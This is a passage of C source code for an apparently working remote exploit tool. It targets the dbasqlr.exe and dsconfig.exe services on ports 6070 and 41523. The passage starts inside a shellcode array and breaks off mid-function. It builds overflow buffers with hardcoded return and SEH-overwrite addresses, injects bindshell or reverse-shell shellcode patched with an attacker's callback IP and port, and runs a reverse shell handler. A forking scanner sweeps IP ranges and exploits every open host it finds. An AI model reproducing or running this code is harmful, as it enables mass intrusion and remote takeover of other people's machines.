\\x85\\x9A\\x44\\x12\\x9D\"\r\n\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x99\\x66\\x66\\x66\\x17\\xD7\\x97\\x75\"\r\n\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\x76\\x57\\x79\\xF9\\x52\\x74\\x65\\xA2\"\r\n\"\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\";\r\n\r\nunsigned char greetz[] 
=\r\n\"\\x20\\x41\\x54\\x20\\x4c\\x45\\x41\\x53\\x54\\x20\\x53\\x4f\\x4d\\x45\\x20\\x47\"\r\n\"\\x52\\x45\\x45\\x54\\x5a\\x20\\x46\\x4c\\x59\\x20\\x54\\x4f\\x3a\\x20\\x48\\x44\"\r\n\"\\x4d\\x2c\\x20\\x54\\x48\\x43\\x2c\\x20\\x41\\x4e\\x44\\x20\\x43\\x41\\x20\\x4f\"\r\n\"\\x46\\x20\\x43\\x4f\\x55\\x52\\x53\\x45\\x20\\x3a\\x29\\x20\\x2d\\x20\\x43\\x59\"\r\n\"\\x42\\x45\\x52\\x54\\x52\\x4f\\x4e\\x49\\x43\\x20\";\r\n\r\n/*\r\n *\r\n * structures\r\n *\r\n */\r\n\r\ntypedef struct _args {\r\n\tchar* tip;\r\n\tchar* lip;\r\n\tint tport;\r\n\tint lport;;\r\n} args;\r\n\r\n/*\r\n *\r\n * functions\r\n *\r\n */\r\n\r\nint\r\nconnect_to_remote_host ( char* tip, unsigned short tport )\r\n{\r\n\tint s;\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct hostent* host_addr;\r\n\r\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\r\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\r\n\t{\r\n\t\tprintf ( \"cannot resolve \\\"%s\\\"\\n\", tip );\r\n\t\texit ( 1 );\r\n\t}\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_port = htons ( tport );\r\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"--[ connecting to %s:%u...\", tip, tport );\r\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"done!\\n\" );\r\n\treturn ( s );\r\n}\r\n\r\nint\r\nexploit_dbasqlr ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\r\n{\r\n\tunsigned long pushesp = 0x20c0c1ab; //Asbrdcst.dll\r\n\tchar buffer[3289];\r\n\r\n\tbzero ( &buffer, sizeof ( buffer ) );\r\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\r\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\r\n\tmemcpy ( buffer + 1337, \"\\x81\\xc4\\x54\\xf2\\xff\\xff\", 6 ); //good code <-------.\r\n\tmemcpy 
( buffer + 3168, ( unsigned char* ) &pushesp, 4 ); // |\r\n\tmemcpy ( buffer + 3172, \"\\xe9\\xd0\\xf8\\xff\\xff\", 5 ); //jmp back 1840 bytes --'\r\n\r\n\tif ( option == 0 )\r\n\t{\r\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\r\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\r\n\t\tmemcpy ( buffer + 1343, reverseshell, sizeof ( reverseshell ) - 1 );\r\n\t}\r\n\telse\r\n\t\tmemcpy ( buffer + 1343, bindshell, sizeof ( bindshell ) - 1 );\r\n\r\n\tprintf ( \"--[ exploiting \" YELLOW \"dbasqlr.exe\" NORMAL\"...\\n\" );\r\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\r\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\treturn ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tsleep ( 1 );\r\n\tclose ( s );\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nexploit_dsconfig ( int s, unsigned long xoredip, unsigned short xoredcbport, int option )\r\n{\r\n\tchar buffer[4129];\r\n\r\n\tbzero ( &buffer, sizeof ( buffer ) );\r\n\tmemset ( buffer, 0x41, sizeof ( buffer ) - 1 );\r\n\r\n\tbuffer[ 0] = 0x9b;\r\n\tbuffer[ 1] = 0x53; //S\r\n\tbuffer[ 2] = 0x45; //E\r\n\tbuffer[ 3] = 0x52; //R\r\n\tbuffer[ 4] = 0x56; //V\r\n\tbuffer[ 5] = 0x49; //I\r\n\tbuffer[ 6] = 0x43; //C\r\n\tbuffer[ 7] = 0x45; //E\r\n\tbuffer[ 8] = 0x50; //P\r\n\tbuffer[ 9] = 0x43; //C\r\n\tbuffer[10] = 0x18;\r\n\tbuffer[11] = 0x01;\r\n\tbuffer[12] = 0x02;\r\n\tbuffer[13] = 0x03;\r\n\tbuffer[14] = 0x04;\r\n\tbuffer[15] = 0x53; //S\r\n\tbuffer[16] = 0x45; //E\r\n\tbuffer[17] = 0x52; //R\r\n\tbuffer[18] = 0x56; //V\r\n\tbuffer[19] = 0x49; //I\r\n\tbuffer[20] = 0x43; //C\r\n\tbuffer[21] = 0x45; //E\r\n\tbuffer[22] = 0x50; //P\r\n\tbuffer[23] = 0x43; //C\r\n\tbuffer[24] = 0x01;\r\n\tbuffer[25] = 0x0c;\r\n\tbuffer[26] = 0x6c;\r\n\tbuffer[27] = 0x93;\r\n\tbuffer[28] = 0xce;\r\n\tbuffer[29] = 0x18;\r\n\tbuffer[30] = 0x18;\r\n\r\n\tmemcpy ( buffer + 14, greetz, sizeof ( greetz ) - 1 );\r\n\tmemcpy ( buffer + 1056, 
\"\\xeb\\x06\", 2 );\r\n\tmemcpy ( buffer + 1060, \"\\x14\\x57\\x80\\x23\", 4 ); //SEH\r\n\tif ( option == 0 )\r\n\t{\r\n\t\tmemcpy ( &reverseshell[111], &xoredip, 4);\r\n\t\tmemcpy ( &reverseshell[118], &xoredcbport, 2);\r\n\t\tmemcpy ( buffer + 1064, reverseshell, sizeof ( reverseshell ) - 1 );\r\n\t}\r\n\telse\r\n\t\tmemcpy ( buffer + 1064, bindshell, sizeof ( bindshell ) - 1 );\r\n\r\n\tprintf ( \"--[ exploiting \" YELLOW \"dsconfig.exe\" NORMAL \"...\\n\" );\r\n\tprintf ( \"--[ sending packet [ %u bytes ]...\", strlen ( buffer ) );\r\n\tif ( write ( s, buffer, strlen ( buffer ) ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\treturn ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tsleep ( 1 );\r\n\tclose ( s );\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nisip ( char *ip )\r\n{\r\n\tint a, b, c, d;\r\n\r\n\tif ( !sscanf ( ip, \"%d.%d.%d.%d\", &a, &b, &c, &d ) )\r\n\t\treturn ( 0 );\r\n\tif ( a < 1 )\r\n\t\treturn ( 0 );\r\n\tif ( a > 255 )\r\n\t\treturn 0;\r\n\tif ( b < 0 )\r\n\t\treturn 0;\r\n\tif ( b > 255 )\r\n\t\treturn 0;\r\n\tif ( c < 0 )\r\n\t\treturn 0;\r\n\tif ( c > 255 )\r\n\t\treturn 0;\r\n\tif ( d < 0 )\r\n\t\treturn 0;\r\n\tif ( d > 255 )\r\n\t\treturn 0;\r\n\treturn 1;\r\n}\r\n\r\nint\r\nis_open ( char* ip, unsigned short tport )\r\n{\r\n\tint s, n, error;\r\n\tint flags;\r\n\tint sec = 0; //change this for wan\r\n\tunsigned long usec = 10000; //works fine on my lan\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct timeval tval;\r\n\tfd_set rset, wset;\r\n\tsocklen_t len;\r\n\r\n\tmemset ( &remote_addr, 0x0, sizeof ( remote_addr ) );\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_port = htons ( tport );\r\n\tinet_pton ( AF_INET, ip, &remote_addr.sin_addr );\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( -1 );\r\n\t}\r\n\r\n\tif ( ( flags = fcntl ( s, F_GETFL, 0 ) ) < 0 )\r\n\t{\r\n\t\tclose ( s );\r\n\t\treturn ( -1 );\r\n\t}\r\n\tif ( 
fcntl ( s, F_SETFL, flags | O_NONBLOCK ) < 0 )\r\n\t{\r\n\t\tclose ( s );\r\n\t\treturn ( -1 );\r\n\t}\r\n\tif ( ( n = connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ) == -1 )\r\n\t{\r\n\t\tif ( errno != EINPROGRESS )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\t}\r\n\tif ( n == 0 )\r\n\t\tgoto done; /* connect completed immediately */\r\n\tFD_ZERO ( &rset );\r\n\tFD_SET ( s, &rset );\r\n\twset = rset;\r\n\ttval.tv_sec = sec;\r\n\ttval.tv_usec = usec;\r\n\r\n\tif ( ( n = select ( s + 1, &rset, &wset, NULL, &tval ) ) == 0 )\r\n\t{\r\n\t\tclose ( s ); /* timeout */\r\n\t\terrno = ETIMEDOUT;\r\n\t\treturn ( 1 );\r\n\t}\r\n\tif ( FD_ISSET ( s, &rset ) || FD_ISSET ( s, &wset ) )\r\n\t{\r\n\t\tlen = sizeof ( error );\r\n\t\tif ( getsockopt ( s, SOL_SOCKET, SO_ERROR, &error, &len ) < 0 )\r\n\t\t\treturn ( -1 );\r\n\t}\r\n\telse\r\n\t{\r\n\t\tprintf ( \"select failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tdone:\r\n\t\tif ( fcntl ( s, F_SETFL, flags ) < 0 )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\t\tif ( error )\r\n\t\t{\r\n\t\t\tclose ( s );\r\n\t\t\terrno = error;\r\n\t\t\treturn ( -1 );\r\n\t\t}\r\n\treturn ( 0 );\r\n}\r\n\r\nint\r\nselect_action ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ choose\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = start scanner\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = send some greetings to ca\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nselect_shellcode ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select shellcode\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = 
bindshell\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = reverseshell\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid shellcode!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nselect_vulnerability ()\r\n{\r\n\tint ret;\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select vulnerability\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" = dsconfig\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%d\", &ret );\r\n\tif ( ret != 0 && ret != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\treturn ( ret );\r\n}\r\n\r\nint\r\nshell ( int s, char* tip, unsigned short cbport )\r\n{\r\n\tint n;\r\n\tchar buffer[2048];\r\n\tfd_set fd_read;\r\n\r\n\tprintf ( \"--[\" YELLOW \" b\" NORMAL \"0\" YELLOW \"x \" NORMAL \"p\" YELLOW \"w\" NORMAL \"n\" YELLOW \"e\" NORMAL \"d \" YELLOW \"- \" NORMAL \"h\" YELLOW \"4\" NORMAL \"v\" YELLOW \"e \" NORMAL \"p\" YELLOW \"h\" NORMAL \"u\" YELLOW \"n\" NORMAL \"\\n\" );\r\n\r\n\tFD_ZERO ( &fd_read );\r\n\tFD_SET ( s, &fd_read );\r\n\tFD_SET ( 0, &fd_read );\r\n\r\n\twhile ( 1 )\r\n\t{\r\n\t\tFD_SET ( s, &fd_read );\r\n\t\tFD_SET ( 0, &fd_read );\r\n\r\n\t\tif ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )\r\n\t\t\tbreak;\r\n\t\tif ( FD_ISSET ( s, &fd_read ) )\r\n\t\t{\r\n\t\t\tif ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tif ( write ( 1, buffer, n ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t}\r\n\t\tif ( FD_ISSET ( 0, &fd_read ) )\r\n\t\t{\r\n\t\t\tif ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 
)\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tif ( send ( s, buffer, n, 0 ) < 0 )\r\n\t\t\t{\r\n\t\t\t\tprintf ( \"bye bye...\\n\" );\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t}\r\n\t\tusleep(10);\r\n\t}\r\n}\r\n\r\nvoid\r\nconnect_to_bindshell ( char* tip, unsigned short bport )\r\n{\r\n\tint s;\r\n\tint sec = 5; // change this for fast targets\r\n\tstruct sockaddr_in remote_addr;\r\n\tstruct hostent* host_addr;\r\n\r\n\tif ( ( host_addr = gethostbyname ( tip ) ) == NULL )\r\n\t{\r\n\t\tfprintf ( stderr, \"cannot resolve \\\"%s\\\"\\n\", tip );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tremote_addr.sin_family = AF_INET;\r\n\tremote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );\r\n\tremote_addr.sin_port = htons ( bport );\r\n\r\n\tif ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"--[ sleeping %d seconds...\\n\", sec );\r\n\tfall_asleep ( sec );\r\n\tprintf ( \"--[ connecting to %s:%u...\", tip, bport );\r\n\tif ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\\n\" NORMAL);\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tshell ( s, tip, bport );\r\n}\r\n\r\nvoid\r\nfall_asleep ( int sec )\r\n{\r\n\tsleep ( sec );\r\n}\r\n\r\nvoid\r\nheader ()\r\n{\r\n\tprintf ( YELLOW \" __ __ _ \\n\" );\r\n\tprintf ( \" _______ __/ /_ ___ _____/ /__________ ____ (_)____ \\n\" );\r\n\tprintf ( \" / ___/ / / / __ \\\\/ _ \\\\/ ___/ __/ ___/ __ \\\\/ __ \\\\/ / ___/ \\n\" );\r\n\tprintf ( \"/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \\n\" );\r\n\tprintf ( \"\\\\___/\\\\__, /_.___/\\\\___/_/ \\\\__/_/ \\\\____/_/ /_/_/\\\\___/ \\n\" );\r\n\tprintf ( \" /____/ \\n\\n\" NORMAL );\r\n\tprintf ( \"--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\\n\" );\r\n}\r\n\r\nvoid\r\nparse_arguments ( int argc, char* argv[], args* argp 
)\r\n{\r\n\tint i = 0;\r\n\r\n\twhile ( ( i = getopt ( argc, argv, \"t:l:p:\" ) ) != -1 )\r\n\t{\r\n\t\tswitch ( i )\r\n\t\t{\r\n\t\t\tcase 't':\r\n\t\t\t\targp->tip = optarg;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'l':\r\n\t\t\t\targp->lip = optarg;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'p':\r\n\t\t\t\targp->lport = atoi ( optarg );\r\n\t\t\t\tbreak;\r\n\t\t\tcase ':':\r\n\t\t\tcase '?':\r\n\t\t\tdefault:\r\n\t\t\t\tusage ( argv[0] );\r\n\t }\r\n }\r\n\r\n if ( argp->tip == NULL || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 )\r\n\t\tusage ( argv[0] );\r\n}\r\n\r\nvoid\r\nstart_reverse_handler ( int cbport )\r\n{\r\n\tint s1, s2;\r\n\tstruct sockaddr_in cliaddr, servaddr;\r\n\tsocklen_t clilen = sizeof ( cliaddr );\r\n\r\n\tbzero ( &servaddr, sizeof ( servaddr ) );\r\n\tservaddr.sin_family = AF_INET;\r\n\tservaddr.sin_addr.s_addr = htonl ( INADDR_ANY );\r\n\tservaddr.sin_port = htons ( cbport );\r\n\r\n\tprintf ( \"--[ starting reverse handler [port: %u]...\", cbport );\r\n\tif ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"socket failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tbind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );\r\n\tif ( listen ( s1, 1 ) == -1 )\r\n\t{\r\n\t\tprintf ( \"listen failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( YELLOW \"done!\\n\" NORMAL);\r\n\tif ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )\r\n\t{\r\n\t\tprintf ( \"accept failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tclose ( s1 );\r\n\tprintf ( \"--[ incomming connection from:\\t\" YELLOW \" %s\\n\" NORMAL, inet_ntoa ( cliaddr.sin_addr ) );\r\n\tshell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );\r\n\tclose ( s2 );\r\n}\r\n\r\nvoid\r\nstart_scanner ( args* argp )\r\n{\r\n\tint i;\r\n\tint s;\r\n\tint fd;\r\n\tint sc;\r\n\tint option;\r\n\tint ip1 = 0, a = 0;\r\n\tint ip2 = 0, b = 0;\r\n\tint ip3 = 0, c = 0;\r\n\tint ip4 = 0, d = 0;\r\n\tint status = 0;\r\n\tchar scan_ip[256];\r\n\tchar 
end_ip[256];\r\n\tchar line[256];\r\n\tchar system_time[64];\r\n\tunsigned short port;\r\n\tunsigned short xoredcbport;\r\n\tunsigned long BRUTE_DELAY = 100000;\r\n\tunsigned long MAX_CHILDS = 40;\r\n\tunsigned long xoredcbip;\r\n\ttime_t ticks = time ( NULL );\r\n\r\n\tbzero ( &scan_ip, sizeof ( scan_ip ) );\r\n\tbzero ( &end_ip, sizeof ( end_ip ) );\r\n\tbzero ( &system_time, sizeof ( system_time ) );\r\n\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ enter IP-range\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"start-ip\" RED \"]\" NORMAL );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%s\", scan_ip );\r\n\tsscanf ( scan_ip, \"%u.%u.%u.%u\", &ip1, &ip2, &ip3, &ip4 );\r\n\tif ( !isip ( scan_ip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"end-ip \" RED \"]\" NORMAL );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%s\", end_ip );\r\n\tsscanf ( end_ip, \"%u.%u.%u.%u\", &a, &b, &c, &d );\r\n\tif ( !isip ( end_ip ) )\r\n\t{\r\n\t\tprintf ( \"Invalid IP!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ select port to scan for\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \" 6070\" RED \"]\" NORMAL \" = dbasqlr\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"41523\" RED \"]\" NORMAL \" = dsconfig\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%u\", &port );\r\n\tif ( port != 6070 && port != 41523 )\r\n\t{\r\n\t\tprintf ( \"--[ I`m only scanning for port 6070 and 41523!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \"--[ I can try to exploit the bug, shall I ?\\n\" );\r\n\tprintf ( \" |\\n\" );\r\n\tprintf ( \" |--\" RED \"[\" NORMAL \"0\" RED \"]\" NORMAL \" yes, try it!\\n\" );\r\n\tprintf ( \" `--\" RED \"[\" NORMAL \"1\" RED \"]\" NORMAL \" no, i`am on my own!\\n\" );\r\n\tprintf ( \"\\n\" );\r\n\tprintf ( \" $ \" );\r\n\tscanf ( \"%u\", &option );\r\n\tif ( option != 
0 && option != 1 )\r\n\t{\r\n\t\tprintf ( \"--[ invalid option!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\tif ( option == 0 )\r\n\t\tsc = select_shellcode ();\r\n\r\n\tif ( ( fd = open ( \"scan.log\", O_CREAT | O_WRONLY | O_APPEND, S_IREAD | S_IWRITE ) ) == -1 )\r\n\t{\r\n\t\tprintf ( \"open failed!\\n\" );\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tsnprintf ( system_time, sizeof ( system_time ) -1, \"\\nDate: %s\\n\\n\", ctime ( &ticks ) );\r\n\tif ( write ( fd, system_time, strlen ( system_time ) -1 ) <= 0 )\r\n\t{\r\n\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\texit ( 1 );\r\n\t}\r\n\r\n\tprintf ( \"\\noO---[ scanner - scan.log ]---Oo\\n\\n\" );\r\n\r\n\twhile ( 1 )\r\n\t{\r\n\t\tif ( ip3 > 254 ) { ip3 = 1; ip2++; }\r\n\t\tif ( ip2 > 254 ) { ip2 = 1; ip1++; }\r\n\t\tif ( ip1 > 254 )\r\n\t\t\texit ( 0 );\r\n\r\n\t\tfor ( ip4; ip4 < 255; ip4++ )\r\n\t\t{\r\n\t\t\ti++;\r\n\t\t\tbzero ( &scan_ip, sizeof ( scan_ip ) );\r\n\t\t\tsnprintf ( scan_ip, sizeof ( scan_ip ) -1, \"%u.%u.%u.%u\", ip1, ip2, ip3, ip4 );\r\n\t\t\tusleep ( BRUTE_DELAY );\r\n\t\t\tswitch ( fork () )\r\n\t\t\t{\r\n\t\t\t\tcase 0:\r\n\t\t\t\t{\r\n\t\t\t\t\tswitch ( is_open ( scan_ip, port ) )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tcase 0:\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprintf ( \"[%s:%d] \" GREEN \"open\" NORMAL \"\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tbzero ( &line, sizeof ( line ) );\r\n\t\t\t\t\t\t\tsnprintf ( line, sizeof ( line ) -1, \"[%s:%d]\\n\\n\", scan_ip, port );\r\n\t\t\t\t\t\t\tif ( write ( fd, line, strlen ( line ) -1 ) <= 0 )\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf ( RED \"failed!\\n\" NORMAL);\r\n\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\tif ( option == 0 )\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\r\n\t\t\t\t\t\t\t\tprintf ( \"oO---[ exploitation ]---Oo\\n\" );\r\n\t\t\t\t\t\t\t\tprintf ( \"\\n\" );\r\n\t\t\t\t\t\t\t\ts = connect_to_remote_host ( scan_ip, port );\r\n\t\t\t\t\t\t\t\tswitch( sc )\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tcase 
0:\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 )\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, ( unsigned long ) NULL, ( unsigned short ) NULL, 1 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tconnect_to_bindshell ( scan_ip, 4444 );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\tcase 1:\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif ( port == 6070 )\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dbasqlr ( s, xoredcbip, xoredcbport, 0 ) == 1 )\r\n\t\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\t\tprintf ( \"exploitation failed!\\n\" );\r\n\t\t\t\t\t\t\t\t\t\t\t\texit ( 1 );\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tstart_reverse_handler ( argp->lport );\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbip = inet_addr ( argp->lip ) ^ ( unsigned long ) 0x99999999;\r\n\t\t\t\t\t\t\t\t\t\t\txoredcbport = htons ( argp->lport ) ^ ( unsigned short ) 0x9999;\r\n\t\t\t\t\t\t\t\t\t\t\tif ( exploit_dsconfig ( s, xoredcbip, xoredcbport, 0 ) == 1 
